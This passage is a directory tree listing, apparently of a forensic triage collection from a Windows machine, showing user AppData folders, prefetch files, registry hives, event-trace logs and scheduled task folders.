│   │       │   │   │   │   │   └── DiagOutputDir
│   │       │   │   │   │   │       ├── LogFile_August_15_2025__3_0_33.txt
│   │       │   │   │   │   │       └── LogFile_August_20_2025__9_52_55.txt
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.XboxGamingOverlay_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.XboxIdentityProvider_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Xbox.TCUI_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.YourPhone_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.ZuneMusic_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.ZuneVideo_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── NcsiUwpApp_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Windows.CBSPreview_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── windows.immersivecontrolpanel_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   └── Windows.PrintDialog_cw5n1h2txyewy
│   │       │   │   │       └── Settings
│   │       │   │   │           ├── roaming.lock
│   │       │   │   │           └── settings.dat
│   │       │   │   └── Temp
│   │       │   │       ├── 18e190413af045db88dfbd29609eb877.db
│   │       │   │       ├── 18e190413af045db88dfbd29609eb877.db.session64
│   │       │   │       ├── ListSync
│   │       │   │       │   └── Common
│   │       │   │       │       └── Microsoft.ListSync.Thumbnails.db
│   │       │   │       ├── msedge_installer.log
│   │       │   │       ├── offline
│   │       │   │       ├── offline.session64
│   │       │   │       ├── wct1A9D.tmp
│   │       │   │       ├── wct3307.tmp
│   │       │   │       ├── wct367F.tmp
│   │       │   │       ├── wct370B.tmp
│   │       │   │       ├── wct62B3.tmp
│   │       │   │       ├── wct68FC.tmp
│   │       │   │       ├── wct941B.tmp
│   │       │   │       ├── wctAC24.tmp
│   │       │   │       ├── wctD681.tmp
│   │       │   │       └── wmsetup.log
│   │       │   └── Roaming
│   │       │       └── Microsoft
│   │       │           ├── Internet Explorer
│   │       │           │   └── Quick Launch
│   │       │           │       ├── Microsoft Edge.lnk
│   │       │           │       └── User Pinned
│   │       │           │           └── TaskBar
│   │       │           │               └── Microsoft Edge.lnk
│   │       │           ├── Protect
│   │       │           │   └── S-1-5-21-3871582759-1638593395-315824688-1002
│   │       │           │       ├── abceede9-fb3c-4a7e-b6e8-094d87f6fbbd
│   │       │           │       └── Preferred
│   │       │           └── Windows
│   │       │               ├── PowerShell
│   │       │               │   └── PSReadline
│   │       │               │       └── ConsoleHost_history.txt
│   │       │               ├── Recent
│   │       │               │   ├── AutomaticDestinations
│   │       │               │   │   ├── 5f7b5f1e01b83767.automaticDestinations-ms
│   │       │               │   │   ├── dd7c3b1adb1c168b.automaticDestinations-ms
│   │       │               │   │   └── f01b4d95cf55d32a.automaticDestinations-ms
│   │       │               │   ├── CustomDestinations
│   │       │               │   │   └── 590aee7bdd69b59b.customDestinations-ms
│   │       │               │   ├── ms-gamingoverlay--kglcheck-.lnk
│   │       │               │   └── The Internet.lnk
│   │       │               └── Start Menu
│   │       │                   └── Programs
│   │       │                       └── OneDrive.lnk
│   │       ├── Desktop
│   │       │   └── Microsoft Edge.lnk
│   │       ├── NTUSER.DAT
│   │       └── ntuser.dat.LOG1
│   └── Windows
│       ├── AppCompat
│       │   └── Programs
│       │       ├── Amcache.hve
│       │       ├── Amcache.hve.LOG1
│       │       └── Amcache.hve.LOG2
│       ├── inf
│       │   └── setupapi.dev.log
│       ├── prefetch
│       │   ├── AM_DELTA.EXE-B7261F63.pf
│       │   ├── AM_DELTA_PATCH_1.435.367.0.EX-798DE6B4.pf
│       │   ├── APPLICATIONFRAMEHOST.EXE-CCEEF759.pf
│       │   ├── ATBROKER.EXE-2E15A492.pf
│       │   ├── AUDIODG.EXE-BDFD3029.pf
│       │   ├── BACKGROUNDTASKHOST.EXE-A89D33B8.pf
│       │   ├── BACKGROUNDTRANSFERHOST.EXE-CF5B50C1.pf
│       │   ├── CMD.EXE-4A81B364.pf
│       │   ├── COMPATTELRUNNER.EXE-DB97728F.pf
│       │   ├── CONHOST.EXE-1F3E9D7E.pf
│       │   ├── CONTROL.EXE-817F8F1D.pf
│       │   ├── CSRSS.EXE-3FE41F7E.pf
│       │   ├── DEFRAG.EXE-588F90AD.pf
│       │   ├── DLLHOST.EXE-28A8211F.pf
│       │   ├── DLLHOST.EXE-504C779A.pf
│       │   ├── DLLHOST.EXE-570206E5.pf
│       │   ├── DLLHOST.EXE-5E46FA0D.pf
│       │   ├── DLLHOST.EXE-B8630D6F.pf
│       │   ├── DLLHOST.EXE-D8E67ED6.pf
│       │   ├── DLLHOST.EXE-FC981FFE.pf
│       │   ├── EXPLORER.EXE-A80E4F97.pf
│       │   ├── GAMEBAR.EXE-912EAA91.pf
│       │   ├── GKAPE.EXE-F0554A53.pf
│       │   ├── GKAPE.EXE-F5F0B33B.pf
│       │   ├── IDENTITY_HELPER.EXE-6B964A14.pf
│       │   ├── IPCONFIG.EXE-912F3D5B.pf
│       │   ├── KAPE.EXE-E008D008.pf
│       │   ├── LOCKAPP.EXE-59620D5A.pf
│       │   ├── LOGONUI.EXE-09140401.pf
│       │   ├── MICROSOFTEDGEUPDATE.EXE-C4317749.pf
│       │   ├── MMC.EXE-F5DC4F82.pf
│       │   ├── MOBSYNC.EXE-C5E2284F.pf
│       │   ├── MOUSOCOREWORKER.EXE-681A8FEE.pf
│       │   ├── MPCMDRUN.EXE-041C7AA5.pf
│       │   ├── MPSIGSTUB.EXE-6CB27A06.pf
│       │   ├── MSCORSVW.EXE-57D17DAF.pf
│       │   ├── MSCORSVW.EXE-C3C515BD.pf
│       │   ├── MSEDGE.EXE-78F14B85.pf
│       │   ├── MSEDGE.EXE-78F14B86.pf
│       │   ├── MSEDGE.EXE-78F14B89.pf
│       │   ├── MSEDGE.EXE-78F14B8D.pf
│       │   ├── MSEDGEWEBVIEW2.EXE-FEC6EA5D.pf
│       │   ├── MSEDGEWEBVIEW2.EXE-FEC6EA5E.pf
│       │   ├── MSEDGEWEBVIEW2.EXE-FEC6EA5F.pf
│       │   ├── MSEDGEWEBVIEW2.EXE-FEC6EA60.pf
│       │   ├── MSEDGEWEBVIEW2.EXE-FEC6EA61.pf
│       │   ├── MSEDGEWEBVIEW2.EXE-FEC6EA65.pf
│       │   ├── NETSH.EXE-F1B6DA12.pf
│       │   ├── NGEN.EXE-AE594A6B.pf
│       │   ├── NGEN.EXE-EC3F9239.pf
│       │   ├── NOTEPAD.EXE-D8414F97.pf
│       │   ├── ONEDRIVE.EXE-EA0F5C7A.pf
│       │   ├── Op-SEARCHAPP.EXE-0F10B1A6-00000002.pf
│       │   ├── PING.EXE-7E94E73E.pf
│       │   ├── POWERSHELL.EXE-920BBA2A.pf
│       │   ├── RDPCLIP.EXE-9067FA0E.pf
│       │   ├── REG.EXE-E7E8BD26.pf
│       │   ├── RUNDLL32.EXE-178B4978.pf
│       │   ├── RUNDLL32.EXE-23EA2E5B.pf
│       │   ├── RUNDLL32.EXE-CF0EC82C.pf
│       │   ├── RUNDLL32.EXE-E7913772.pf
│       │   ├── RUNTIMEBROKER.EXE-005D3145.pf
│       │   ├── RUNTIMEBROKER.EXE-25819C5C.pf
│       │   ├── RUNTIMEBROKER.EXE-72C0C855.pf
│       │   ├── RUNTIMEBROKER.EXE-757E9611.pf
│       │   ├── RUNTIMEBROKER.EXE-94A02D86.pf
│       │   ├── RUNTIMEBROKER.EXE-98F22970.pf
│       │   ├── RUNTIMEBROKER.EXE-B0371F78.pf
│       │   ├── RUNTIMEBROKER.EXE-CF3B7A99.pf
│       │   ├── RUNTIMEBROKER.EXE-D9106866.pf
│       │   ├── RUNTIMEBROKER.EXE-E70C9E46.pf
│       │   ├── RUNTIMEBROKER.EXE-F4C9B956.pf
│       │   ├── SCHTASKS.EXE-5CA45734.pf
│       │   ├── SEARCHAPP.EXE-42595928.pf
│       │   ├── SEARCHAPP.EXE-C0170CFD.pf
│       │   ├── SEARCHFILTERHOST.EXE-77482212.pf
│       │   ├── SEARCHPROTOCOLHOST.EXE-0CB8CADE.pf
│       │   ├── SECURITYHEALTHHOST.EXE-A928C304.pf
│       │   ├── SECURITYHEALTHSERVICE.EXE-EE3BC4CB.pf
│       │   ├── SECURITYHEALTHSYSTRAY.EXE-41AD6DE1.pf
│       │   ├── SESSIONMSG.EXE-B52942BF.pf
│       │   ├── SETHC.EXE-6A2DC453.pf
│       │   ├── SGRMBROKER.EXE-0CA31CC6.pf
│       │   ├── SHELLEXPERIENCEHOST.EXE-EF3EE583.pf
│       │   ├── SHUTDOWN.EXE-E7D5C9CC.pf
│       │   ├── SLUI.EXE-724E99D9.pf
│       │   ├── SMARTSCREEN.EXE-9B5E4173.pf
│       │   ├── SPPSVC.EXE-B0F8131B.pf
│       │   ├── SSH.EXE-C88A8FBA.pf
│       │   ├── STARTMENUEXPERIENCEHOST.EXE-D80E778C.pf
│       │   ├── SVCHOST.EXE-033BBABB.pf
│       │   ├── SVCHOST.EXE-090AEBE5.pf
│       │   ├── SVCHOST.EXE-0B3A9016.pf
│       │   ├── SVCHOST.EXE-25616620.pf
│       │   ├── SVCHOST.EXE-2C71F80E.pf
│       │   ├── SVCHOST.EXE-2D56ECA4.pf
│       │   ├── SVCHOST.EXE-2F0E0AF4.pf
│       │   ├── SVCHOST.EXE-481FFCC8.pf
│       │   ├── SVCHOST.EXE-4BA0E729.pf
│       │   ├── SVCHOST.EXE-5AC380EC.pf
│       │   ├── SVCHOST.EXE-7AC6742A.pf
│       │   ├── SVCHOST.EXE-7CFEDEA3.pf
│       │   ├── SVCHOST.EXE-80F4A784.pf
│       │   ├── SVCHOST.EXE-8102A33C.pf
│       │   ├── SVCHOST.EXE-871F52B2.pf
│       │   ├── SVCHOST.EXE-8A87D622.pf
│       │   ├── SVCHOST.EXE-9F4DB6F5.pf
│       │   ├── SVCHOST.EXE-A7CE0A80.pf
│       │   ├── SVCHOST.EXE-AE7DB802.pf
│       │   ├── SVCHOST.EXE-B25CCDFF.pf
│       │   ├── SVCHOST.EXE-C49E779A.pf
│       │   ├── SVCHOST.EXE-D217A328.pf
│       │   ├── SVCHOST.EXE-DCBDF9F5.pf
│       │   ├── SVCHOST.EXE-E3D0CD52.pf
│       │   ├── SVCHOST.EXE-E45D8788.pf
│       │   ├── SVCHOST.EXE-EDE0F878.pf
│       │   ├── SVCHOST.EXE-EE1C9ACA.pf
│       │   ├── SYSTEMINFO.EXE-1905EE9D.pf
│       │   ├── SYSTEMPROPERTIESADVANCED.EXE-68C7C4F0.pf
│       │   ├── SYSTEMSETTINGS.EXE-01D72268.pf
│       │   ├── TASKHOSTW.EXE-3E0B74C8.pf
│       │   ├── TEXTINPUTHOST.EXE-95832A05.pf
│       │   ├── TIWORKER.EXE-2CC5645B.pf
│       │   ├── TRUSTEDINSTALLER.EXE-3CC531E5.pf
│       │   ├── TSTHEME.EXE-14AC78EA.pf
│       │   ├── USOCLIENT.EXE-5A8A3A5E.pf
│       │   ├── VMTOOLSD.EXE-CD82EC13.pf
│       │   ├── VMWARERESOLUTIONSET.EXE-79C811DD.pf
│       │   ├── VSSVC.EXE-B8AFC319.pf
│       │   ├── WERFAULT.EXE-E69F695A.pf
│       │   ├── WERMGR.EXE-0F2AC88C.pf
│       │   ├── WEVTUTIL.EXE-EF5861C4.pf
│       │   ├── WINLOGON.EXE-B020DC41.pf
│       │   ├── WINSAT.EXE-DE36CB46.pf
│       │   ├── WLRMDR.EXE-C2B47318.pf
│       │   ├── WMIADAP.EXE-F8DFDFA2.pf
│       │   ├── WMIAPSRV.EXE-29F35ED0.pf
│       │   ├── WMIPRVSE.EXE-1628051C.pf
│       │   ├── WUAUCLT.EXE-70318591.pf
│       │   ├── WUDFHOST.EXE-AFFEF87C.pf
│       │   └── WWAHOST.EXE-3FD45057.pf
│       ├── ServiceProfiles
│       │   ├── LocalService
│       │   │   ├── NTUSER.DAT
│       │   │   ├── NTUSER.DAT.LOG1
│       │   │   └── NTUSER.DAT.LOG2
│       │   └── NetworkService
│       │       ├── AppData
│       │       │   └── Local
│       │       │       └── Microsoft
│       │       │           └── Windows
│       │       │               └── DeliveryOptimization
│       │       │                   └── Logs
│       │       │                       ├── domgmt.20250421_104627_712.etl
│       │       │                       ├── domgmt.20250421_174342_214.etl
│       │       │                       ├── domgmt.20250814_163714_952.etl
│       │       │                       ├── domgmt.20250815_210725_523.etl
│       │       │                       ├── domgmt.20250820_165449_024.etl
│       │       │                       ├── domgmt.20250824_225010_773.etl
│       │       │                       ├── domgmt.20250825_195610_790.etl
│       │       │                       ├── dosvc.20250421_104551_025.etl
│       │       │                       ├── dosvc.20250814_162958_655.etl
│       │       │                       ├── dosvc.20250815_210643_463.etl
│       │       │                       ├── dosvc.20250815_211435_096.etl
│       │       │                       ├── dosvc.20250815_212351_064.etl
│       │       │                       ├── dosvc.20250815_213331_377.etl
│       │       │                       ├── dosvc.20250815_214219_970.etl
│       │       │                       ├── dosvc.20250820_165007_152.etl
│       │       │                       ├── dosvc.20250820_171359_555.etl
│       │       │                       ├── dosvc.20250824_224525_122.etl
│       │       │                       ├── dosvc.20250824_231618_893.etl
│       │       │                       └── dosvc.20250825_195228_352.etl
│       │       ├── NTUSER.DAT
│       │       ├── NTUSER.DAT.LOG1
│       │       └── NTUSER.DAT.LOG2
│       ├── System32
│       │   ├── config
│       │   │   ├── DEFAULT
│       │   │   ├── DEFAULT.LOG1
│       │   │   ├── DEFAULT.LOG2
│       │   │   ├── SAM
│       │   │   ├── SAM.LOG1
│       │   │   ├── SAM.LOG2
│       │   │   ├── SECURITY
│       │   │   ├── SECURITY.LOG1
│       │   │   ├── SECURITY.LOG2
│       │   │   ├── SOFTWARE
│       │   │   ├── SOFTWARE.LOG1
│       │   │   ├── SOFTWARE.LOG2
│       │   │   ├── SYSTEM
│       │   │   ├── SYSTEM.LOG1
│       │   │   └── SYSTEM.LOG2
│       │   ├── LogFiles
│       │   │   └── WMI
│       │   │       ├── LwtNetLog.etl
│       │   │       ├── Microsoft-Windows-Rdp-Graphics-RdpIdd-Trace.etl
│       │   │       ├── NetCore.etl
│       │   │       ├── NtfsLog.etl
│       │   │       ├── RadioMgr.etl
│       │   │       ├── RtBackup
│       │   │       │   ├── EtwRTDefenderApiLogger.etl
│       │   │       │   ├── EtwRTDefenderAuditLogger.etl
│       │   │       │   ├── EtwRTDiagLog.etl
│       │   │       │   ├── EtwRTDiagtrack-Listener.etl
│       │   │       │   ├── EtwRTEventLog-Application.etl
│       │   │       │   └── EtwRTEventLog-System.etl
│       │   │       └── Wifi.etl
│       │   ├── SleepStudy
│       │   │   ├── ScreenOn
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-14-09-29-01.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-15-14-04-44.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-15-14-21-51.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-20-09-47-48.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-20-10-11-35.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-24-15-44-28.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-24-15-59-09.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-24-16-14-18.etl
│       │   │   │   ├── ScreenOnPowerStudyTraceSession-2025-08-25-12-50-27.etl
│       │   │   │   └── ScreenOnPowerStudyTraceSession-2025-08-25-13-07-35.etl
│       │   │   └── UserNotPresentSession.etl
│       │   ├── SRU
│       │   │   ├── SRU00031.log
│       │   │   ├── SRU00032.log
│       │   │   ├── SRU00033.log
│       │   │   ├── SRU.chk
│       │   │   ├── SRUDB.dat
│       │   │   ├── SRUDB.jfm
│       │   │   ├── SRU.log
│       │   │   ├── SRUres00001.jrs
│       │   │   └── SRUtmp.log
│       │   ├── Tasks
│       │   │   ├── Microsoft
│       │   │   │   ├── Windows
│       │   │   │   │   ├── Active Directory Rights Management Services Client
│       │   │   │   │   │   ├── AD RMS Rights Policy Template Management (Automated)
│       │   │   │   │   │   └── AD RMS Rights Policy Template Management (Manual)
│       │   │   │   │   ├── AppID
│       │   │   │   │   │   ├── EDP Policy Manager
│       │   │   │   │   │   ├── PolicyConverter
│       │   │   │   │   │   └── VerifiedPublisherCertStoreCheck
│       │   │   │   │   ├── applicationdata
│       │   │   │   │   │   ├── appuriverifierdaily
│       │   │   │   │   │   ├── appuriverifierinstall
│       │   │   │   │   │   ├── CleanupTemporaryState
│       │   │   │   │   │   └── DsSvcCleanup
│       │   │   │   │   ├── Application Experience
│       │   │   │   │   │   ├── Microsoft Compatibility Appraiser
│       │   │   │   │   │   ├── PcaPatchDbTask
│       │   │   │   │   │   ├── ProgramDataUpdater
│       │   │   │   │   │   └── StartupAppTask
│       │   │   │   │   ├── AppListBackup
│       │   │   │   │   │   └── Backup
│       │   │   │   │   ├── AppxDeploymentClient
│       │   │   │   │   │   └── Pre-staged app cleanup
│       │   │   │   │   ├── Autochk
│       │   │   │   │   │   └── Proxy
│       │   │   │   │   ├── BitLocker
│       │   │   │   │   │   ├── BitLocker Encrypt All Drives
│       │   │   │   │   │   └── BitLocker MDM policy Refresh
│       │   │   │   │   ├── Bluetooth
│       │   │   │   │   │   └── UninstallDeviceTask
│       │   │   │   │   ├── BrokerInfrastructure
│       │   │   │   │   │   └── BgTaskRegistrationMaintenanceTask
│       │   │   │   │   ├── CertificateServicesClient
│       │   │   │   │   │   ├── AikCertEnrollTask
│       │   │   │   │   │   ├── CryptoPolicyTask
│       │   │   │   │   │   ├── KeyPreGenTask
│       │   │   │   │   │   ├── SystemTask
│       │   │   │   │   │   ├── UserTask
│       │   │   │   │   │   └── UserTask-Roam
│       │   │   │   │   ├── Chkdsk
│       │   │   │   │   │   ├── ProactiveScan
│       │   │   │   │   │   └── SyspartRepair
│       │   │   │   │   ├── Clip
│       │   │   │   │   │   ├── LicenseImdsIntegration
│       │   │   │   │   │   └── License Validation
│       │   │   │   │   ├── CloudExperienceHost
│       │   │   │   │   │   └── CreateObjectTask
│       │   │   │   │   ├── Customer Experience Improvement Program
│       │   │   │   │   │   ├── Consolidator
│       │   │   │   │   │   └── UsbCeip
│       │   │   │   │   ├── Data Integrity Scan
│       │   │   │   │   │   ├── Data Integrity Check And Scan
│       │   │   │   │   │   ├── Data Integrity Scan
│       │   │   │   │   │   └── Data Integrity Scan for Crash Recovery
│       │   │   │   │   ├── Defrag
│       │   │   │   │   │   └── ScheduledDefrag
│       │   │   │   │   ├── DeviceDirectoryClient
│       │   │   │   │   │   ├── HandleCommand
│       │   │   │   │   │   ├── HandleWnsCommand
│       │   │   │   │   │   ├── IntegrityCheck
│       │   │   │   │   │   ├── LocateCommandUserSession
│       │   │   │   │   │   ├── RegisterDeviceAccountChange
│       │   │   │   │   │   ├── RegisterDeviceLocationRightsChange
│       │   │   │   │   │   ├── RegisterDevicePeriodic24
│       │   │   │   │   │   ├── RegisterDevicePolicyChange
│       │   │   │   │   │   ├── RegisterDeviceProtectionStateChanged
│       │   │   │   │   │   ├── RegisterDeviceSettingChange
│       │   │   │   │   │   └── RegisterUserDevice
│       │   │   │   │   ├── Device Information
│       │   │   │   │   │   ├── Device
│       │   │   │   │   │   └── Device User
│       │   │   │   │   ├── Device Setup
│       │   │   │   │   │   └── Metadata Refresh
│       │   │   │   │   ├── Diagnosis
│       │   │   │   │   │   ├── RecommendedTroubleshootingScanner
│       │   │   │   │   │   └── Scheduled
│       │   │   │   │   ├── DirectX
│       │   │   │   │   │   ├── DirectXDatabaseUpdater
│       │   │   │   │   │   └── DXGIAdapterCache
│       │   │   │   │   ├── DiskCleanup
│       │   │   │   │   │   └── SilentCleanup
│       │   │   │   │   ├── DiskDiagnostic
│       │   │   │   │   │   ├── Microsoft-Windows-DiskDiagnosticDataCollector
│       │   │   │   │   │   └── Microsoft-Windows-DiskDiagnosticResolver
│       │   │   │   │   ├── DiskFootprint
│       │   │   │   │   │   ├── Diagnostics
│       │   │   │   │   │   └── StorageSense
│       │   │   │   │   ├── DUSM
│       │   │   │   │   │   └── dusmtask
│       │   │   │   │   ├── EDP
│       │   │   │   │   │   ├── EDP App Launch Task
│       │   │   │   │   │   ├── EDP Auth Task
│       │   │   │   │   │   ├── EDP Inaccessible Credentials Task
│       │   │   │   │   │   └── StorageCardEncryption Task
│       │   │   │   │   ├── ExploitGuard
│       │   │   │   │   │   └── ExploitGuard MDM policy Refresh
│       │   │   │   │   ├── Feedback
│       │   │   │   │   │   └── Siuf
│       │   │   │   │   │       ├── DmClient
│       │   │   │   │   │       └── DmClientOnScenarioDownload
│       │   │   │   │   ├── File Classification Infrastructure
│       │   │   │   │   │   └── Property Definition Sync
│       │   │   │   │   ├── FileHistory
│       │   │   │   │   │   └── File History (maintenance mode)
│       │   │   │   │   ├── Flighting
│       │   │   │   │   │   ├── FeatureConfig
│       │   │   │   │   │   │   ├── ReconcileFeatures
│       │   │   │   │   │   │   ├── UsageDataFlushing
│       │   │   │   │   │   │   └── UsageDataReporting
│       │   │   │   │   │   └── OneSettings
│       │   │   │   │   │       └── RefreshCache
│       │   │   │   │   ├── HelloFace
│       │   │   │   │   │   └── FODCleanupTask
│       │   │   │   │   ├── Input
│       │   │   │   │   │   ├── LocalUserSyncDataAvailable
│       │   │   │   │   │   ├── MouseSyncDataAvailable
│       │   │   │   │   │   ├── PenSyncDataAvailable
│       │   │   │   │   │   └── TouchpadSyncDataAvailable
│       │   │   │   │   ├── InstallService
│       │   │   │   │   │   ├── ScanForUpdates
│       │   │   │   │   │   ├── ScanForUpdatesAsUser
│       │   │   │   │   │   ├── SmartRetry
│       │   │   │   │   │   ├── WakeUpAndContinueUpdates
│       │   │   │   │   │   └── WakeUpAndScanForUpdates
│       │   │   │   │   ├── International
│       │   │   │   │   │   └── Synchronize Language Settings
│       │   │   │   │   ├── LanguageComponentsInstaller
│       │   │   │   │   │   ├── Installation
│       │   │   │   │   │   ├── ReconcileLanguageResources
│       │   │   │   │   │   └── Uninstallation
│       │   │   │   │   ├── License Manager
│       │   │   │   │   │   └── TempSignedLicenseExchange
│       │   │   │   │   ├── Location
│       │   │   │   │   │   ├── Notifications
│       │   │   │   │   │   └── WindowsActionDialog
│       │   │   │   │   ├── Maintenance
│       │   │   │   │   │   └── WinSAT
│       │   │   │   │   ├── Management
│       │   │   │   │   │   ├── Autopilot
│       │   │   │   │   │   │   ├── DetectHardwareChange
│       │   │   │   │   │   │   └── RemediateHardwareChange
│       │   │   │   │   │   └── Provisioning
│       │   │   │   │   │       ├── Cellular
│       │   │   │   │   │       ├── Logon
│       │   │   │   │   │       ├── Retry
│       │   │   │   │   │       └── RunOnReboot
│       │   │   │   │   ├── Maps
│       │   │   │   │   │   ├── MapsToastTask
│       │   │   │   │   │   └── MapsUpdateTask
│       │   │   │   │   ├── MemoryDiagnostic
│       │   │   │   │   │   ├── ProcessMemoryDiagnosticEvents
│       │   │   │   │   │   └── RunFullMemoryDiagnostic
│       │   │   │   │   ├── Mobile Broadband Accounts
│       │   │   │   │   │   └── MNO Metadata Parser
│       │   │   │   │   ├── MUI
│       │   │   │   │   │   └── LPRemove
│       │   │   │   │   ├── Multimedia
│       │   │   │   │   │   └── SystemSoundsService
│       │   │   │   │   ├── NetTrace
│       │   │   │   │   │   └── GatherNetworkInfo
│       │   │   │   │   ├── NlaSvc
│       │   │   │   │   │   └── WiFiTask
│       │   │   │   │   ├── Offline Files
│       │   │   │   │   │   ├── Background Synchronization
│       │   │   │   │   │   └── Logon Synchronization
│       │   │   │   │   ├── PI
│       │   │   │   │   │   ├── SecureBootEncodeUEFI
│       │   │   │   │   │   ├── Secure-Boot-Update
│       │   │   │   │   │   └── Sqm-Tasks
│       │   │   │   │   ├── Plug and Play
│       │   │   │   │   │   ├── Device Install Group Policy
│       │   │   │   │   │   ├── Device Install Reboot Required
│       │   │   │   │   │   └── Sysprep Generalize Drivers
│       │   │   │   │   ├── Power Efficiency Diagnostics
│       │   │   │   │   │   └── AnalyzeSystem
│       │   │   │   │   ├── Printing
│       │   │   │   │   │   ├── EduPrintProv
│       │   │   │   │   │   └── PrinterCleanupTask
│       │   │   │   │   ├── PushToInstall
│       │   │   │   │   │   ├── LoginCheck
│       │   │   │   │   │   └── Registration
│       │   │   │   │   ├── Ras
│       │   │   │   │   │   └── MobilityManager
│       │   │   │   │   ├── RecoveryEnvironment
│       │   │   │   │   │   └── VerifyWinRE
│       │   │   │   │   ├── Registry
│       │   │   │   │   │   └── RegIdleBackup
│       │   │   │   │   ├── RemoteAssistance
│       │   │   │   │   │   └── RemoteAssistanceTask
│       │   │   │   │   ├── RetailDemo
│       │   │   │   │   │   └── CleanupOfflineContent
│       │   │   │   │   ├── Servicing
│       │   │   │   │   │   └── StartComponentCleanup
│       │   │   │   │   ├── SettingSync
│       │   │   │   │   │   ├── BackgroundUploadTask
│       │   │   │   │   │   └── NetworkStateChangeTask
│       │   │   │   │   ├── SharedPC
│       │   │   │   │   │   └── Account Cleanup
│       │   │   │   │   ├── Shell
│       │   │   │   │   │   ├── CreateObjectTask
│       │   │   │   │   │   ├── FamilySafetyMonitor
│       │   │   │   │   │   ├── FamilySafetyRefreshTask
│       │   │   │   │   │   ├── IndexerAutomaticMaintenance
│       │   │   │   │   │   ├── ThemesSyncedImageDownload
│       │   │   │   │   │   └── UpdateUserPictureTask
│       │   │   │   │   ├── SoftwareProtectionPlatform
│       │   │   │   │   │   ├── SvcRestartTask
│       │   │   │   │   │   ├── SvcRestartTaskLogon
│       │   │   │   │   │   └── SvcRestartTaskNetwork
│       │   │   │   │   ├── SpacePort
│       │   │   │   │   │   ├── SpaceAgentTask
│       │   │   │   │   │   └── SpaceManagerTask
│       │   │   │   │   ├── Speech
│       │   │   │   │   │   └── SpeechModelDownloadTask
│       │   │   │   │   ├── StateRepository
│       │   │   │   │   │   └── MaintenanceTasks
│       │   │   │   │   ├── Storage Tiers Management
│       │   │   │   │   │   ├── Storage Tiers Management Initialization
│       │   │   │   │   │   └── Storage Tiers Optimization
│       │   │   │   │   ├── Subscription
│       │   │   │   │   │   ├── EnableLicenseAcquisition
│       │   │   │   │   │   └── LicenseAcquisition
│       │   │   │   │   ├── Sysmain
│       │   │   │   │   │   ├── HybridDriveCachePrepopulate
│       │   │   │   │   │   ├── HybridDriveCacheRebalance
│       │   │   │   │   │   ├── ResPriStaticDbSync
│       │   │   │   │   │   └── WsSwapAssessmentTask
│       │   │   │   │   ├── SystemRestore
│       │   │   │   │   │   └── SR
│       │   │   │   │   ├── Task Manager
│       │   │   │   │   │   └── Interactive
│       │   │   │   │   ├── TextServicesFramework
│       │   │   │   │   │   └── MsCtfMonitor
│       │   │   │   │   ├── Time Synchronization
│       │   │   │   │   │   ├── ForceSynchronizeTime
│       │   │   │   │   │   └── SynchronizeTime
│       │   │   │   │   ├── Time Zone
│       │   │   │   │   │   └── SynchronizeTimeZone
│       │   │   │   │   ├── TPM
│       │   │   │   │   │   ├── Tpm-HASCertRetr
│       │   │   │   │   │   └── Tpm-Maintenance
│       │   │   │   │   ├── UNP
│       │   │   │   │   │   └── RunUpdateNotificationMgr
│       │   │   │   │   ├── UpdateOrchestrator
│       │   │   │   │   │   ├── Report policies
│       │   │   │   │   │   ├── Schedule Maintenance Work
│       │   │   │   │   │   ├── Schedule Scan
│       │   │   │   │   │   ├── Schedule Scan Static Task
│       │   │   │   │   │   ├── Schedule Wake To Work
│       │   │   │   │   │   ├── Schedule Work
│       │   │   │   │   │   ├── UpdateModelTask
│       │   │   │   │   │   └── USO_UxBroker
│       │   │   │   │   ├── UPnP
│       │   │   │   │   │   └── UPnPHostConfig
│       │   │   │   │   ├── USB
│       │   │   │   │   │   └── Usb-Notifications
│       │   │   │   │   ├── User Profile Service
│       │   │   │   │   │   └── HiveUploadTask
│       │   │   │   │   ├── WaaSMedic
│       │   │   │   │   │   └── PerformRemediation
│       │   │   │   │   ├── WCM
│       │   │   │   │   │   └── WiFiTask
